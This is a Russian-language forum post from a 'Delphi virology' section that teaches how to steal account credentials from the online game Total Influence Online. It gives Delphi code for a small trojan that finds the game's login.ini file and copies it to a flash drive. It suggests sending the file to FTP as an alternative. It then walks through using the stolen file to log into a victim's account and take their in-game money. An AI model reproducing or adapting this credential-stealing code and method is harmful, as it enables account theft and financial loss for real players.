Суббота, 28.11.2020, 02:19 Приветствую вас Гость | Группа "Гости" 
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 1 из 1
  • 1
Модератор форума: Волк-1024, Anton93, xXxSh@dowxXx  
delphicode » Delphi » Вирусология Delphi » Крадем пароли из Total Influence Online (TIOnline)
Крадем пароли из Total Influence Online
gravitasДата: Суббота, 12.03.2011, 17:54 | Сообщение # 1
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
Вобщем выбрал себе онлайн игру для проведения свободного времени. Ее мне посоветовал один друг. Игра конечно не супер-популярная, но обороты все же набирает. Клиент весит около 80 мб.
И уже через день игры я решил ее "вскрыть" (в свободное время), и узнать что от туда можно вытащить и воспользоваться с пользой. Моей главной и по совместительству последней находкой (после этого я больше ничего не искал) стал файл login.ini , расположенный в Папка_С_Игрой\base\login.ini .
И вот я уже открываю блокнот с моей частоиспользуемой и любимой функцией "GetWin", которая ищет системные папки винды.
Ее код:
Code
function GetWin(Comand: string): string;
var
    buff: array [0 .. $FF] of char;
begin
    ExpandEnvironmentStrings(PChar(Comand), buff, SizeOf(buff));
    Result := buff;
end;

Напишем простенький трой, который будет воровать этот файл на флешку. Почему на флешку? Да просто для примера! Кому надо тот может его слать на ФТП или еще куда нить. Так же воспользуемся процедурой FileExists для проверки наличия нужного нам файла.

Code
uses windows;
...
if fileexists(pchar(getwin('%programfiles%')+ '\TIOnline\base\login.ini')) then
copyfile(pchar(getwin('%programfiles%')+'\TIOnline\base\login.ini'),
     pchar('G:\login.ini'),
          false);

Вот собсно и все. Итак, что мы сделали: трой запускается и копирует нужный нам файл с паролем на флушку. Мы берем этот файл и заменяем свой такой не него. Потом как-нибудь узнаем логин жертвы (его можно спокойно узнать в игре) и входим в игру. На месте нашего старого пароля будет пароль из угнанного файла, а логин мы вводим вручную (предварительно узнав его). Заходим, и воруем деньги жертвы)

 
delphicode » Delphi » Вирусология Delphi » Крадем пароли из Total Influence Online (TIOnline)
  • Страница 1 из 1
  • 1
Поиск:

delphicode.ru © 2008 - 2020 Хостинг от uCoz